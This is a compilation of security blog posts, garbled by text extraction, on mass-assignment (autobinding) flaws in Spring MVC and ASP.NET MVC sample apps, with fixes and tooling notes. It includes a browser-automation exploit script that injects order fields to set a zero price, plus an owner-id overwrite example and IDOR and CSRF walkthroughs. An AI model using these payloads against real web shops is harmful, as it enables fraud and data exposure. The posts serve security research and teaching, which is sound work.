from the O2 Demo Pack that I published (see Packaged Spring MVC Security Test Apps: JPetStore and PetClinic)
Unzip the files to the C:O2Demos folder

And drag and drop the petclinic.classes.zip file into the big red box (top left) from the O2 Spring MVC module,
July 2011
22
which will trigger the conversion process:

Once the coversion is finished, you will see the Spring MVC mappings and its source code location:
If you select a URL that uses @ModelAttribure, and go to the _Spring MVC Bindable fields for selection tab, you will see a graphical representation
of the fields that can be binded into (and that create another variation of the Spring Framework Autobinding
Note that in order for the

vulnerabilities)
o2 engine to find some of these mappings, there are a couple cases where an extra comment needs to
be added to the affected classes. For example, in the Owner.java class: [sourcecode language=csharp
wraplines=false] public List<Pet> getPets() { /O2Helper:MVCAutoBindListObject:org.springframework.samples.petclinic.Pet/
[/sourcecode] This O2 tool also has a BlackBox analysis module, which allow the use of the mappings created
July 2011
23
to drive/test the website dynamically

For
example here is how to bypass the current SetDisallowedFields protection that is included in the controller
for /editOwner.do [sourcecode language=csharp wraplines=false] @InitBinder public void setAllowedFields(WebDataBinder dataBinder) { dataBinder.setDisallowedFields(new String[] {id}); } [/sourcecode] Note
the extra field pets[0].owner.id=6 which save the current data into user #6
This app (together with JPetStore) presents good case-studies on the security vulnerabilities that are easily
created with the Spring Autobinding capabilities. In the above example, the Edit Owner page should
only allow 5 fields to be edited, while in fact it allows a VERY large number of fields to be edited
July 2011
24
In fact, in this case, there are infinite posibilites, since: the

Owner class has a getPets method, which returns a Pets class, who has a getOwner method, who has a
getPets method , etc. This applicaition also has a large number of XSS vulnerabilities, including the ability
to create a Pet with a XSS payload which (via autobinding) can be assigned to another user (i.e. via modifing
the pets owner ID)
2 September 2011
September 2011
example of spring mvc controllers
here is an example of spring MVC controllers. Can you spot the vulnerability?
26
3 November 2011
November 2011
28
Fixing one of JPetStores AutoBinding Vulnerabilities (changing

the purchase price)
JPetStore (test application included with the Spring Framework) has a couple Autobinding vulnerabilities. The
objective of this post is to present a solution for fixing them that meets the following criteria:
minumal code changes on the controllers

no code changes on the views
dramatically reduction of the size of the binded object (the ModelAttribute, CommandClass),
matches the expected web-layer inputs (i.e. the attack surface)
supports UnitTesting
doesnt rely on Spring Frameworks recommended solution (which is based on the SetAllowedFields
and SetDisallowedFields)
Here are a number of posts that give the brackground to this problem and document the O2 Script Im using
to test the fix:
Two Security Vulnerabilities in the Spring Frameworks MVC pdf (from 2008)
O2 Script with BlackBox exploits for Spring MVC AutoBinding vulnerabilities in JPetStore
Packaged Spring MVC Security Test Apps: JPetStore and PetClinc
Current O2 support for analyzing Spring MVC
JPetStore releated O2 blog posts: http://o2platform.wordpress.com/category/java/spring-mvc/jpetstore/
The vulnerability we are going to fix is the one that allows (amongst other things) the modification of the
TotalPrice value of our shopping cart (which is not a good thing :) ) This vulnerability is graphically described
in this video: [youtube=http://www.youtube.com/watch?v=yzTExpNZ2bw] and it is fundamentally created
by the fact that the setTotalPrice() method is exposed in the Order class which is exposed in the OrderForm
class (which is used as the command class for the OrderFormController). So here is the fix. 1) The first
step is to create a class that can be used on as the CommandClass. Trying to give it a name that
made sense for what is was going to do, I called it OrderData and place it in a package called jpetstore.domain.fromWeb (vs the original OrderForm class in the package jpetstore.domain) [sourcecode language=csharp wraplines=false] package org.springframework.samples.jpetstore.domain.fromWeb; import
org.springframework.samples.jpetstore.domain.Order; import org.springframework.samples.jpetstore.web.spring.OrderForm;
public class OrderData { private OrderForm orderForm; public OrderData(OrderForm orderForm) { this.orderForm
= orderForm; } public static OrderForm getOrderForm(Object command) { OrderData orderData = (OrderData)command; return orderData.orderForm; } //bindable values public OrderData getOrder() { return this; }
. } [/sourcecode] This expects to receive an OrderForm object in its contructor which it will store in a private
field. The static getOrderForm() method is there to help the casting of the object given to us by the Spring
Framework 2) On the FormBackingObject method return an OrderData object instead of an OrderForm
object (which is vulnerable to the AutoBinding injection) and put on the Http Request attributes the original
orderForm object (this will allow the views to have access to the original orderForm , which they expec,t,
and prevent us from needing to make code changes to the view (the fact that views should have access
to massive domain objects is a topic for another time)) [sourcecode language=csharp wraplines=false]
November 2011
29
protected Object formBackingObject(HttpServletRequest request) throws ModelAndViewDefiningException

{ UserSession userSession = (UserSession) request.getSession().getAttribute(userSession); Cart cart = (Cart)
request.getSession().getAttribute(sessionCart); if (cart != null) { // Re-read account from DB at teams request.
Account account = this.petStore.getAccount(userSession.getAccount().getUsername()); OrderForm orderForm
= new OrderForm(); orderForm.getOrder().initOrder(account, cart); request.setAttribute(orderForm, orderForm); // AutoBinding fix return new OrderData(orderForm); // AutoBinding fix } else { ModelAndView modelAndView = new ModelAndView(Error); modelAndView.addObject(message, An order could not be
created because a cart could not be found.); throw new ModelAndViewDefiningException(modelAndView); }
} [/sourcecode] 3) modify all locations that originally received the OrderFrom object from SpringFramework **in order to handle the fact that it is now an OrderData object (this uses the static method
getOrderForm in order to make the code change short and sweet) > onBindAndValidate [sourcecode
language=csharp wraplines=false] protected void onBindAndValidate(HttpServletRequest request,
Object command, BindException errors, int page) { if (page == 0 && request.getParameter(shippingAddressRequired)
== null) { //OrderForm orderForm = (OrderForm) command; // AutoBinding fix OrderForm orderForm =
OrderData.getOrderForm(command); // AutoBinding fix orderForm.setShippingAddressRequired(false);
} } [/sourcecode] > on getTargetPage: [sourcecode language=csharp wraplines=false] protected
int getTargetPage(HttpServletRequest request, Object command, Errors errors, int currentPage) {
//OrderForm orderForm = (OrderForm) command; // AutoBinding fix OrderForm orderForm = OrderData.getOrderForm(command); // AutoBinding fix if (currentPage == 0 && orderForm.isShippingAddressRequired())
{ return 1; } else { return 2; } } [/sourcecode] >processFinish [sourcecode language=csharp wraplines=false]
protected ModelAndView processFinish( HttpServletRequest request, HttpServletResponse response,
Object command, BindException errors) { //OrderForm orderForm = (OrderForm) command; // AutoBinding fix OrderForm orderForm = OrderData.getOrderForm(command); // AutoBinding fix this.petStore.insertOrder(
request.getSession().removeAttribute(sessionCart); Map model = new HashMap(); model.put(order,
orderForm.getOrder()); model.put(message, Thank you, your order has been submitted.); return
new ModelAndView(ViewOrder, model); } [/sourcecode] **4) finally add to the FormData object the
getters and setters of the variables that we want to expose. A good place to find out which variables to ex-
pose is to look at the values that are submited from the web pages, in this case:
Here is the full code of this class: [sourcecode language=csharp wraplines=false] package org.springframework.samples.jpets
import org.springframework.samples.jpetstore.domain.Order; import org.springframework.samples.jpetstore.web.spring.Order
public class OrderData { private OrderForm orderForm; public OrderData(OrderForm orderForm) { this.orderForm
= orderForm; } public static OrderForm getOrderForm(Object command) { OrderData orderData = (OrderData)command; return orderData.orderForm; } //bindable values public void setShippingAddressRequired
November 2011
30
(boolean shippingAddressRequired) { this.orderForm.setShippingAddressRequired(shippingAddressRequired);

} public OrderData getOrder() { return this; } public void setCardType (String cardType) { this.orderForm.getOrder().setCardType
(cardType);} public void setCreditCard (String creditCard) { this.orderForm.getOrder().setCreditCard (creditCard); } public void setExpiryDate (String expiryDate) { this.orderForm.getOrder().setExpiryDate (expiryDate); } public void setBillToFirstName (String billToFirstName) { this.orderForm.getOrder().setBillToFirstName
(billToFirstName); } public void setBillToLastName (String billToLastName) { this.orderForm.getOrder().setBillToLastName
(billToLastName); } public void setBillAddress1 (String billAddress1) { this.orderForm.getOrder().setBillAddress1
(billAddress1); } public void setBillAddress2 (String billAddress1) { this.orderForm.getOrder().setBillAddress2
(billAddress1); } public void setBillCity (String billCity) { this.orderForm.getOrder().setBillCity (billCity);
} public void setBillState (String billState) { this.orderForm.getOrder().setBillState (billState); } public void
setBillZip (String billZip) { this.orderForm.getOrder().setBillZip (billZip); } public void setBillCountry (String
billCountry) { this.orderForm.getOrder().setBillCountry (billCountry); } public String getCardType () { return
this.orderForm.getOrder().getCardType ();} public String getCreditCard () { return this.orderForm.getOrder().getCreditCard
();} public String getExpiryDate () { return this.orderForm.getOrder().getExpiryDate ();} public String getBillToFirstName() { return this.orderForm.getOrder().getBillToFirstName();} public String getBillToLastName
() { return this.orderForm.getOrder().getBillToLastName ();} public String getBillAddress1 () { return this.orderForm.getOrder().g
();} public String getBillAddress2 () { return this.orderForm.getOrder().getBillAddress2 ();} public String getBillCity () { return this.orderForm.getOrder().getBillCity ();} public String getBillState () { return this.orderForm.getOrder().getBillSta
();} public String getBillZip () { return this.orderForm.getOrder().getBillZip ();} public String getBillCountry () { return this.orderForm.getOrder().getBillCountry ();} } [/sourcecode] The getOrder() method which
returns the OrderData object, is a cool trick to trick the StringFramwork (which will come looking for
an getOrder() method) and prevent us from creating multiple class files (which is where blind spots tend
to occur). I like the fact that I can put all bindable variables in one location/file. There is a small side
effect that now we can provide multiple order.* values, ie. order.order.order.order.order.billCity (I wonder
if there is DoS angle here) And thats it (this example is a bit simpler since JPetStore doesnt use a
very complex binding wiring (for example no config files to change), but I will provide more examples
later that handle the other variations. Now, with this fix in place we can verify the fix by running the
web automation script that previously allowed us to control the purchase price, and now it doesnt :)
exploit variation #1
exploit variation #2
November 2011
31
4 May 2012
May 2012
ASP.NET MVC MUSIC STORE

ASP.NET MVC MUSIC STORE
33
May 2012
Order details
Order details
34
May 2012
HTTP form post fields using Fiddler

HTTP form post fields using Fiddler
35
May 2012
Checkout controller
Checkout controller
36
May 2012
37
Exploiting Microsoft MVC vulnerabilities using OWASP O2

Platform
In this post, Im going to show the value added of using OWASP O2 Platform to exploit (and therefore
correct/detect/prevent) vulnerabilities on top of Microsoft MVC platform. Background The industry has
broadly adopting MVC architecture to build Web applications during the last years for several reasons,
including the rapid and efficient paradigm it represents to build really good applications. Few weeks ago
, a user exploited a vulnerability at GitHub . The vulnerability exploited in this case, represents an old
issue in the MVC architecture of different frameworks including Rails. This vulnerability is often named
mass assignment , but it is also known as over posting or autobinding. Dinis Cruz wrote an interesting post
about this vulnerability in the Spring MVC framework in this post http://diniscruz.blogspot.com/2012/04/weneed-security-focused-saststatic.html. In this same line, Dinis wrote a really nice O2 script that allows to
exploit this vulnerability on top of Microsoft MVC . In order to illustrate this use case of OWASP O2
platform, Dinis used a demo MVC application named MVC Music Store hosted in CodePlex( this is a
great application that shows the use of this architecture). Once you have this application up and running
, then you probably are going to see something like this: [caption id=attachment1544 align=alignnone
ASP.NET MVC MUSIC STORE[/caption]

width=592]
O2 Script to exploit the vulnerability ****Dinis wrote the following script below to exploit this vulnerability, basically it is an IE automation script very powerful to overposting some post form fields and
update them. Lets see the script and then a quick explanation about it. [sourcecode language=csharp]
var ie = ie_Fyila.o2Cache(() panel.clear().add_IE()).silent(true); // ie ramdon value for o2cache makes
this object to unique amongst multiple instances of this control var site = http://localhost:26641; Action<string,string,string> register = (username, password,email){ ie.open(site + /Account/Register); ie.field(UserName).val
ie.field(Email).value(email); ie.field(Password).value(password); ie.field(ConfirmPassword).value(password);
ie.button(Register).click(); }; Action loginAsTestUser = (){ var user1_name = test_user.add_RandomLetters(5); var user1_email = test@testuser.com; var user1_pwd = a pwd.add_RandomLetters(10); register(user1_name, user1_pwd, user1_email); }; Action selectTestProductAndCheckout = (){ ie.link(Rock).scrollIntoView().flash(
//Selection Led Zeppeling I album ie.link( Led Zeppelin I ).scrollIntoView().flash().click(); ie.link(Add to
cart).flash().click(); ie.link(Checkout >>).flash().click(); }; Action populateSubmitOrder = (){ var Address
= Foo Address; var City = Foo City; var Country = Foo Country; var Email = Email@email.com;
var FirstName = Foo FirstName; var LastName = Foo LastName; var Phone = Foo Phone; var PostalCode = AAA BBB; var State = Foo State; var PromoCode = FREE; // currently hard coded promotional code ie.field(Address).value(Address); ie.field(City).value(City); ie.field(Country).value(Country);
ie.field(Email).value(Email); ie.field(FirstName).value(FirstName); ie.field(LastName).value(LastName);
May 2012
38
ie.field(Phone).value(Phone); ie.field(PostalCode).value(PostalCode); ie.field(PromoCode).value(PromoCode);

ie.field(State).value(State); }; Action submitOrder = (){ ie.button(Submit Order).click(); }; Action createOrderUsingTestUser = (){ loginAsTestUser(); selectTestProductAndCheckout(); populateSubmitOrder(); submitOrder(); }; Action injectField = (fieldName, value){ ie.field(FirstName) .injectHtml_afterEnd( {0}:.format(fieldName, value)); }; Action runExploit1 = (){ loginAsTestUser(); selectTestProductAndCheckout();
populateSubmitOrder(); //the following simulates adding this to the POST request following URI Convention:
//OrderDetails[0].OrderDetailId=1&OrderDetails[0].OrderId=1&OrderDetails[0].AlbumId=1&OrderDetails[0].Quantity=1&O
injectField(OrderDetails[0].OrderDetailId,1); injectField(OrderDetails[0].OrderId,1); injectField(OrderDetails[0].Album
injectField(OrderDetails[0].Quantity,1); injectField(OrderDetails[0].UnitPrice,0); submitOrder(); ie.open(site
+ /OrderDetails); }; runExploit1(); return done; //O2File:WatiN_IE_ExtensionMethods.cs //O2Ref:WatiN.Core.1x.dll
//O2Tag_DontAddExtraO2Files; [/sourcecode] If you look at this script, you will notice that it purpose is to
register a user, select an album and submit the order, but look that the script injects other fields (related to other
album), so we are buying just one album but we are also submitting a second one by injecting it as a part of the
HTML form fields, and guess what? it is for free :). This is the HTTP Post form field that were sent to the server:
[caption id=attachment1568 align=alignnone width=1024]

HTTP form post fields using Fiddler[/caption] And this is how our order detail looks like : [caption
id=attachment1565 align=alignnone width=1024]

Order details[/caption] How was this possible? ** **If you look at the Orders model, you will notice that this
model has some properties and the last one is a list of OrderDetails and lf you look carefully, then you will
see that this property is not protected against modifications (like using ReadOnly attributes) . That makes
possible that we could send some other fields as a part of the request. [sourcecode language=csharp] //Some
properties of the Orders model. [Required(ErrorMessage = Email Address is required)] [DisplayName(Email
Address)] [RegularExpression(@[A-Za-z0-9.%+-]+@[A-Za-z0-9.-]+.[A-Za-z]{2,4},ErrorMessage = Email is
is not valid.)] [DataType(DataType.EmailAddress)] public string Email { get; set; } [ScaffoldColumn(false)]
public decimal Total { get; set; } public List
5 June 2013
June 2013
40
Using ASP.NET MVC 4.0 in TeamMentor (with simple Controller,

View and master Layout)
On _TeamMentors _3.3. release we added support for C# RazorEngine and System.Web.Razor.
For 3.4 release, there is requirement to add Markdown support (see next post). Since the API that I want to use
(MarkdownDeep) works really well with ASP.NET MVC 4.0, here is how I added ASP.NET MVC 4.0 support
to TeamMentor.
The process was quite smooth, and I was able to quickly get it up and running.
It all started with NuGet where I added this package
Which (after Resharper optimization) results in two MVC dependencies (System.Web.MVC and System.Web.WebPages)
UPDATE: Azure required a couple more MVC dependencies

_
_Since one of my objectives in adding this library is to not touch the TeamMentor.CoreLib assembly (which
is where the global.asax.cs file is), I used the Asp.Net App_Code AppInitialize non-documented featured
(invoked before Application_Start) technique to register the main Routes on an file called MCV_Config.cs
added to the App_Code folder:
June 2013
41
I then added a MvcTestController.cs file with a controller class with two methods
and a view called Index.cshtml **_(located in the **_/Mvc/Views/*_ folder instead of the default _/Views/MvcTest/* folder)
June 2013
42
and a master view called __layout.cshtml** (referenced from the **_Index.cshtml razor file shown
above)
and that is it :)
The __layout.cshtml** file is basically the **_AngularJS main page used by _TBot, _with all the ASP.NET
MVC _**interaction happening with the **@RenderBody_ command (shown above)
After compiling the project, here is what the http://localhost:3187/MvcTest looks like (in Chrome inside
VisualStudio)
June 2013
We can also access the same page on http://localhost:3187/MvcTest/FirstAction
And open the other controller method at http://localhost:3187/MvcTest/SecondAction
43
June 2013
44
6 July 2013
July 2013
46
Can you spot the security implications/vulnerability of a small

change to an ASP.NET MVC 3.0+ Model Binder?
This post contains an example of a serious security vulnerability that is common on ASP.NET MVC
applications.
There are two versions of a Model Binder (**CartModelBinder) **class shown below, one or both are
vulnerable.
Your job is to find out how to exploit them :)
Ideally you should provide your answer/results/proof using UnitTests :)
Note 1: The vulnerability shown in this post is a variation of real-world vulnerability that I helped to find a
couple weeks ago (on an UK-based financial services company).
Note 2: Im yet to to look/review/see a large MVC application** that doesnt have similar vulnerabilities (on
both ASP.NET MVC or Spring MVC)
**
****Note 3: the code is from the http://sportsstoremvc3.codeplex.com/ sample application, which is used as
an real-world application example by the Pro ASP.NET MVC 4 book (the code was compiled using .NET 4.0
and executed using the ASP.NET MVC 3.0 and ASP.NET MVC 4.0 versions).
Code to Review:
Lets say that you have an ASP.NET MVC 4.0 (or 3.0) project with this configuration:
1
2
3
protected void Application_Start()

{
AreaRegistration.RegisterAllAreas();
RegisterGlobalFilters(GlobalFilters.Filters);
RegisterRoutes (RouteTable.Routes);
ModelBinders.Binders.Add(typeof(Cart), new CartModelBinder());
DependencyResolver.SetResolver(new NinjectDependencyResolver());
}
With the CartModelBinder (used to create instances of the Cart Object) looking like this:
1
2
3
public class CartModelBinder : DefaultModelBinder

{
private const string sessionKey = "Cart";
protected override object CreateModel(ControllerContext controllerContext, ModelBindingContext bindingContext, Type modelType)
July 2013
{
// get the Cart from the session
Cart cart = (Cart)controllerContext.HttpContext.Session[sessionKey];
// create the Cart if there wasnt one in the session data
if (cart == null)
{
cart = new Cart();
controllerContext.HttpContext.Session[sessionKey] = cart;
}
// return the cart
return cart;
}
}
With these Cart, CartLine and Product Model classes:
1
2
3
public class Cart

{
private List<CartLine> lineCollection = new List<CartLine>();
public IEnumerable
public class CartLine
{
public Product Product { get; set; }
public int Quantity { get; set; }
}
public class Product
{
[HiddenInput(DisplayValue = false)]
public int ProductID { get; set; }
[Required(ErrorMessage = Please enter a product name)]
public string Name { get; set; }
[DataType(DataType.MultilineText)]
[Required(ErrorMessage = Please enter a description)]
public string Description { get; set; }
[Required]
[Range(0.01, double.MaxValue, ErrorMessage = Please enter a positive price)]
public decimal Price { get; set; }
//[HiddenInput(DisplayValue = false)]
public int CategoryID { get; set; }
public virtual Category Category { get; set; }
}
And finally, with these controllers:
47
July 2013
1
2
3
4
48
public RedirectToRouteResult AddToCart(Cart cart, int productId, string returnUrl)

{
Product product = repository.Products
.FirstOrDefault(p => p.ProductID == productId);
if (product != null)
{
cart.AddItem(product, 1);
}
return RedirectToAction(Index, new { returnUrl });
}
public PartialViewResult Summary(Cart cart)
{
return PartialView(cart);
}
public ViewResult Index(Cart cart,string returnUrl)
{
return View(new CartIndexViewModel
{
Cart = cart,
ReturnUrl = returnUrl
});
}
Can you spot any security vulnerability(ies)?
What about if we change the CartModelBinder _**to use the **_IModelBinder (and BindModel) instead
of DefaultModelBinder (and CreateModel)?
1
2
3
public class CartModelBinder : IModelBinder

{
private const string sessionKey = "Cart";
public object BindModel(ControllerContext controllerContext,ModelBindingContext bindingContext)

{
// get the Cart from the session
Cart cart = (Cart)controllerContext.HttpContext.Session[sessionKey];
// create the Cart if there wasnt one in the session data
if (cart == null)
{
cart = new Cart();
controllerContext.HttpContext.Session[sessionKey] = cart;
}
// return the cart
July 2013
49
return cart;
}
}
Anything changed? (from a security point of view, since the app works ok with both versions)
Can you spot any security vulnerability with this 2nd version of the CartModelBinder?
Or are both vulnerable?
:)
**
****Wrapping up: Here is the question being asked in this post:**
_
_
What is are the security implications of these two variations of an **CartModelBinder **(which both provide
the same business-logic functionality)
Related Threads:
Security vulnerability created by ASP.NET MVC ModelBinder (SO Question)
http://www.reddit.com/r/dotnet/comments/1iiq67/can_you_spot_the_security/
http://www.reddit.com/r/netsec/comments/1iiq7j/can_you_spot_the_security/
**
****Some references and related articles:**
**
**External:
http://msdn.microsoft.com/en-us/library/system.web.mvc.imodelbinder(v=vs.108).aspx
http://msdn.microsoft.com/en-us/library/system.web.mvc.defaultmodelbinder(v=vs.98).aspx
https://github.com/ASP-NET-MVC/aspnetwebstack/blob/master/src/System.Web.Mvc/DefaultModelBinder.cs
http://stackoverflow.com/questions/3183931/how-do-i-invoke-updatemodel-from-within-a-custom-modelbindermvc
http://stackoverflow.com/questions/3774287/asp-net-mvc-controller-updatemodel-not-updating
http://stackoverflow.com/questions/1550520/best-practices-when-implementing-imodelbinder
http://odetocode.com/blogs/scott/archive/2009/04/27/6-tips-for-asp-net-mvc-model-binding.aspx (check
out tip #3)
http://lostechies.com/jimmybogard/2009/03/18/a-better-model-binder/
http://www.dalsoft.co.uk/blog/index.php/2010/05/21/mvc-model-binders/
http://lostechies.com/jimmybogard/2013/07/17/how-we-do-mvc-4-years-later/ and http://stackoverflow.com/questions/
should-i-design-my-model-to-be-tightly-coupled-to-my-view (on _1:1 ratio between view model classes
and view _concept)
http://www.codeproject.com/Articles/471784/Exploiting-Microsoft-MVC-vulnerabilities-using-OWA
From this blog
July 2013

ASP.NET MVC XSS and AutoBind Vulns in MVC Example app (from 2008)
50
July 2013
51
Nice business logic vulnerability and CSRF on the ASP.NET MVC

Design Patterns book sample
Following a comment on this reddit threadt I did a search for ASP.NET MVC Design patterns and found the
site https://aspnetdesignpatterns.codeplex.com which is from the Wrox Professional ASP.NET Design Patterns
book.
Since it looked like a nice MVC application, I grabbed a copy of the source code, upgraded it to .NET 4.0/MVC
4.0 (now on GitHub here) and had a quick look for MVC ModelBinding vulnerabilities.
And although it looks like the app is NOT vulnerable to MVC Model injections, that is mainly because there
are very few controllers that use ModelBinding (i.e. that Design Pattern was not used (which ironically is my
main recommendation to deal with MVC ModelBinding Vulnerabilities: dont use Model Binding :) )).
Insecure Direct Object References
While looking for ModelBinding issues, I also had a look for the Top 10 2013-A4-Insecure Direct Object
References and found a nice example of what not to do.
Here is the user page with the past orders
. here is the page where I can see the 1st order (for the current user)
July 2013
. and here is the 2nd order:
spot any probs so far?

Here is the controller that handles that request:
52
July 2013
53
Since this controller asks for an orderId (which as seen above, in our current users case was 29 and 30),
where is the code that checks that the requested orderId belongs to the current user?
. well since in this case it is not there
July 2013
54
it is possible to see other customers orders (and shipping address)
Which makes for a nice example of an business logic vulnerability, where the request data is valid, but we are
accessing information that shouldnt be visible to the current logged in user.
The solution for this vulnerability is to Use Indirect Object References
CSRF
**
**This app is also vulnerable to CSRF (Cross Site Request Forgery)
Here is the raw HTTP Request (with only a valid session ID and Basket)
July 2013
which changed the current total of items were buying to 11:
Bad error handing:

This app also could do a much better job
**
**
at handling malformed data
55
July 2013
56
with some errors only caught on the view (due to lack of data in the model)
**
****XSS via product data**
**
**Talking about the views, this app does a pretty good job at using HtmlEncode on the views, except on this
page:
July 2013
57
Which means that XSS payloads could be introduced via the product database (normally managed via other
systems/websites)
Is there more?
**
**Probably, and it would be interesting to find and fix them (grab the code from GitHub and have a go)
July 2013
58
Day 1 - made it to Vegas, start of ASP.NET MVC research

So after an 18h flight (with stopover in Toronto) I made it to Las Vegas. It was a really productive flight and
I was finally able to spend some time focus on really learning how the ASP.NET MVC actually works.
I read a large section of Professional ASP.NET MVC 4 book (by Wrox) which is a great way to quickly learn
what can be done with MVC 4. Although still very light on security, that book is actually one of the best ones (of
all ASP.NET MVC books I have) on mentioning security. Unfortunately, on the ModelBinding vulnerabilities
(aka over-posting), there is very little to alert the reader for the dangers of MVCs ModelBinding.
This is also the first 24h that I have been off-the-main-grid (see Trying to keep secure while at BlackHat and
DefCon 2013) and there are still a couple things to sort out:
I got an US SIM card, but it looks like my IPhone is not unlocked after all, so either I unjailbreak it or
get an cheap android phone for the week
At the airport I bough an Windows Surface RT, since they are now 250 and I needed something to do
after my battery died during the flight over (I also want to run the O2 Platform on it, and create an
TeamMentor app for it)
Before I left I also:
added the diniscruz_defcon@outlook.com email account to this blog as an author (so I can write
posts like this :) )
created a twitter account https://twitter.com/DCruz_DefCon which I wanted to link into my main
account (I run out of time, where the idea was to have a bot somewhere retweeting that into my
main twitter)
Going without email is interesting and very liberating (the people that matter know my new email
address so Im not missing nothing that urgent).
It is also quite interesting to think about how create an environment that is secure(r) and one that is
easier to detect if there has been any type of compromise
On the topic of security John Wilander just tweeted a link to this 272 page pdf on Mac OS X Security
Configuration which looks quite good (and he is now using temp pwds which is a great thing)
Today I all about coding and researching (not really planning to go to BlackHat today). Im going to stay
around the Mirage and code/blog away on what I will present on Sunday with Abe (btw the DefCon schedule
is out and we are presenting Resting on Your Laurels will get you Pwned: Effectively Code Reviewing REST
Applications to avoid getting powned on Sunday at 11:00 am (track 4)
July 2013
59
MVC ModelBinding Vulnerability in Contoso University sample

(first raw PoC)
While on the plane to Vegas, I looked at a number of ASP.NET MVC apps (ping me if you know of other good
ones to look at (with publicly available source code)).
I was trying to find one that had good examples of MVC ModelBinding Vulnerabilities (aka overposting), in
a real-world-kinda-way (I have found tons of MVC ModelBinding Vulnerability examples which usually get
dismissed with a that is not the recommended way to code MVC controllers).
So I think I found a great example (of what not to do) on the Contoso University sample.
This application is explained in detail in this article Creating an Entity Framework Data Model for an ASP.NET
MVC Application (1 of 10) and can be downloaded from http://code.msdn.microsoft.com/ASPNET-MVCApplication-b01a9fe8/view/SourceCode (as shown below, you can also get this from the official ASP.NET
MVC website)
Remember that this is how developers learn about programming ASP.NET MVC, so it is important that the
code samples they have access to (from reputable sources like http://www.asp.net/mvc) are rock solid and
dont have MVC ModelBinding Vulnerabilities.
A quick look at the code showed numerous vulnerable controllers, and in this first (raw) PoC example,
we are going to exploit the public **ActionResult Edit(int id, FormCollection formCollection, string[]
selectedCourses) **method from the InstructorController.cs file.
This is what the vulnerable code looks like:
July 2013
60
Here is the list of current Instructors (note the extra course on Scratch (added in a previous execution of the
PoC)
Here is the page that is used to edit an Instructors details (and the one we will use on the exploit)
July 2013
61
Here is the source code of the exploit PoC:

Here is the execution of the code shown above (with a new course on _Exploit MVC _which was added by
the exploit)
July 2013
62
This is actually an interesting scenario, specially since the affected controller tries to prevent injection into
the Courses field :)
My next series of blog posts will explain how this works, and how it was possible to add a new course while
editing an Instructor details
7 October 2012
October 2012
64
Exploiting Microsoft MVC vulnerabilities using OWASP O2

Platform
Michael Hidalgo wrote this great article on using O2 to exploit an overposting (i.e. auto-binding) vuln in an
ASP.NET MVC demo app: Exploiting Microsoft MVC vulnerabilities using OWASP O2 Platform
As you can notice that was posted on CodeProject.com which has always been a good source of technical
content for me (although not a site I would use everyday). That said, Im starting to like the new version of
http://codeproject.com and this could be a great place to post O2-related technical articles.
On the Asp.NET MVC topic, if you are interested, here are a couple related posts:
The next step is to see how we can write SAST rules (maybe executed by Cat.NET) to find these issues on the
source code.
I really dont have hard numbers, but I will bet that the number of Asp.NET apps vulnerable is really high
(just like what happens with the Spring Framework MVC)
October 2012
65
Tool - O2 Cmd SpringMVC v1.0.exe - as standalone exe

I just had a request for the O2s Spring MVC module (developed ages ago), and It was was a good opportunity
to test the latest version of the _O2 Standalone tool builde_r, since it now supports the embedding of the
tools installed via an O2 Script (usually stored in the _ToolsOrApis folder).
You can download the Tool - O2 Cmd SpringMVC v1.0.exe (or build it using O2) which is the stand alone exe
of the old O2_Cmd_SpringMvc.msi tool (See at the end of this post for details on how this exe was created)
When you open this tool, you will get a GUI that looks like this:
Then if you drop a jar (or the zip of *.classes like the one you will find in the jPetClinic O2 Demo Pack.zip that
you get from the Packaged Spring MVC Security Test Apps: JPetStore and PetClinc ), a series of conversions
will occur (Jython is used to parse the java byte code) :
October 2012
66
Which when finished will look like this:
For a detailed explanation of how this module works (including the VERY important /*O2Helper:MVCAutoBindListObject:
hack) take a look at this blog post:
Visualizing Spring MVC Annotations based Controls (and Autobinding PetClinics vulnerabilities)
October 2012
67
October 2012
68
How the Tool - O2 Cmd SpringMVC v1.0.exe was created

It was quite easy to package the O2_Cmd_SpringMvc.msi tool (note-to-self: do this for the other really
powerful old O2 tools that are gathering dust in the O2 archives)
Step 1: Create an installer that downloads and extracts the msi:
**
**
Step 2: In an O2 C# REPL script create the_ Tool - O2 Cmd SpringMVC.h2_ file

Which will consume the installers (shown above) and will trigger the extraction (when executed for the first
time as a standalone exe)
Step 3: Open the context menu and chose the item to package the current script
October 2012
69
And thats it!

The package tool (which is a script it self) should be open with the created exe:
Its quite powerful the fact that it took me longer to write this blog post than to package that old O2 tool :)
8 December 2012
December 2012
71
ASP.NET MVC XSS and AutoBind Vulns in MVC Example app

(from 2008)
Here is a old pdf that I wrote ages ago (Sep 2008) that documents a couple Spring MVC AutoBinding
vulnerabilities (similar to the ones shown in Exploiting Microsoft MVC vulnerabilities using OWASP O2
Platform)
December 2012
72
ASP.NET Support in SAST and IBM F4F

At the moment (Dec 2012) my understanding is that all SAST tools struggle to scan/understand ASP.NET
MVC apps.
The only way to really support/understand/scan ASP.NET MVC is to map how that framework works/behaves
(I dont think any SAST vendor/tool does that), and as with any Framework, there is a lot to map:
The controllers (equivalent to WebServices methods, which need to be marked as Tainted-Sources/Callbacks)

**The controllers authorization/authentication **mappings (done using Attributes)
The Autobinded Models
The Views mappings (i..e what views are connected to what controllers)
The MVC Execution life cycle
The auto-encoding (or not)** of view controls **(and new display engines like razor)
The core concept is that we need an ASP.NET MVC aware parser/tool that will then be used to mass create
the rules for the SAST scanners.
The approach that I take with the O2 Platform is to do just that, and it all starts with trying to find out where
the controllers are and the cases where Model-Attributes are used (I.e autobindings).
That said, at the moment there is not a lot of support in the O2 Platform for ASP.NET MVC (specially when
compared with Spring MVC). There are a couple ASP.NET MVC mini-tools in the O2 Scripts folder that help
with ASP.NET MVC controllers visualization (which I plan to document and post about) and there is the
CodeProject article: Exploiting Microsoft MVC vulnerabilities using OWASP O2 Platform
For reference see the Spring Framework posts (which show what we will need to do for ASP.NET MVC):
in this blog (posts tagged with Spring Framework)
in the O2 Platform blog (posts tagged with Spring MVC)
Back in ASP.NET MVC land, once we have the (for example) controllers mappings, they will need to
communicated to the SAST engine.
One way to do this is to mass create rules directly on the SAST engine database (like what I used to do with
OunceLabs MySql database).
Another way (if you are an AppScan Source user) is to use the newly released IBM F4F (Framework for
Frameworks) technology/concept.
If you dont know what F4F is, here are some IBM resources/papers:
F4F: Taint Analysis of Framework-based Web Applications (presentation at OOPSLA 2011)
F4F: Taint Analysis of Framework-based Web Applications (research paper with support materials here)
F4F Technology Helps You Analyze Applications For Security
December 2012
73
I think F4F is a great idea and concept, since it is a way to mass create rules (and mappings) that tell the
AppScan Source engine where are the source and sinks (and glues) of the app being scan.
